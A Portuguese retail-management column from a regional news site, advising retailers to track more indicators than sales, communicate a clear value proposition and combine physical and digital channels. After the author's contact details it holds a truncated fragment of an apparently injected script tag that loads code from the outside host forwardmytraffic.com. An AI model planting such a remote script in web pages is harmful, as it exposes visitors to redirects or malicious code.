InícioColunasApenas vender não é suficiente para obter bons resultados

Apenas vender não é suficiente para obter bons resultados

Últimas notícias

A Trajetória de Antônio Viliczinski e a Origem do 3ºBPM

Dando continuidade à série de entrevistas com veteranos do...

Saúde intensifica campanha e alerta sobre sintomas de arboviroses

Com mais de 93 mil casos prováveis de dengue,...

Polícia Militar derruba ponto de tráfico em Três Barras

Após diversas denúncias anônimas via 190 sobre atividades de...

É importante também ampliar indicadores de desempenho e mesclar modelos de operação

Ampliar os indicadores de desempenho usados para acompanhar os resultados das lojas e mesclar operações físicas com digitais são fatores de sucesso para o varejo daqui para a frente. O espaço para prosperar é cada vez menor se a empresa não tiver uma marca forte e não estabelecer uma comunicação com seus consumidores a partir de seus reais desejos e necessidades. Também é preciso ficar alerta para a necessidade de acompanhar as tendências e entender para onde caminha o setor varejista.

 

Gestão bem explicada

“O varejo até hoje tinha praticamente a venda como único indicador para a gestão do negócio. Quase sempre a ‘melhor loja’ era a que ‘vendia mais’. Se olharmos o setor como um todo, ainda são poucas as empresas que utilizam, por exemplo, o número de itens por cupom. E ainda há outros indicadores, como o fluxo de pessoas e a taxa de conversão. Uma questão que impede uma venda melhor é a fila. Em uma compra de conveniência, as pessoas não querem esperar mais do que 5 minutos para serem atendidas. Isso também precisa ser medido. Os sistemas de gestão hoje apresentam muito mais informações do que o varejista realmente precisa. Por isso, ele deve focar o que é importante, aquilo que está comprometendo as vendas ou o que apresenta oportunidade de negócio”.

 

Boa comunicação com o cliente

“O varejista precisa estabelecer claramente sua proposta de valor e o segmento de mercado em que vai atuar para focar a comunicação nisso. Existem hoje, por exemplo, diversas empresas que priorizam bons serviços e atendimento com o objetivo de se distanciar do negócio de ‘menor preço’. Ou seja, comunicação é principalmente ter foco e direcionamento”.

 

Loja mais atrativa

“Costumo dizer que exposição é a alma do negócio. É preciso ter uma boa ilha ou ponta de gôndola, por exemplo. De forma mais geral, é necessário contar com ambiente acolhedor, boa iluminação, capricho na definição dos expositores e da comunicação visual e até música ambiente. Tudo isso pode contribuir na construção de uma boa experiência de compra, principalmente se aliado a um atendimento cordial”.

 

Para onde caminha o varejista

“Estamos vivendo uma época sem precedentes de novas tecnologias, o que dificulta previsões de onde estará o varejo daqui a 5, 10 anos. O negócio de supermercados está migrando cada vez mais para um ‘negócio de abastecimento residencial’. Nesse conceito, o consumidor já está ditando qual canal prefere para realizar suas ‘reposições’ diárias, semanais ou mensais. Esses canais podem ser digitais, nos quais, por meio de aplicativos, é possível escolher marcas, preço e onde a compra deve ser entregue: em casa, no local de trabalho ou ainda se a pessoa quer retirá-la no drive-thru ou na loja física. O espaço para prosperar é cada vez menor para quem não consegue estabelecer uma comunicação com seus consumidores a partir dos seus reais desejos e necessidades. Só vender, hoje, não basta”.

Email: [email protected] | Site: www.mixx.adm.br | WPP: 42 9 9841 0280

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.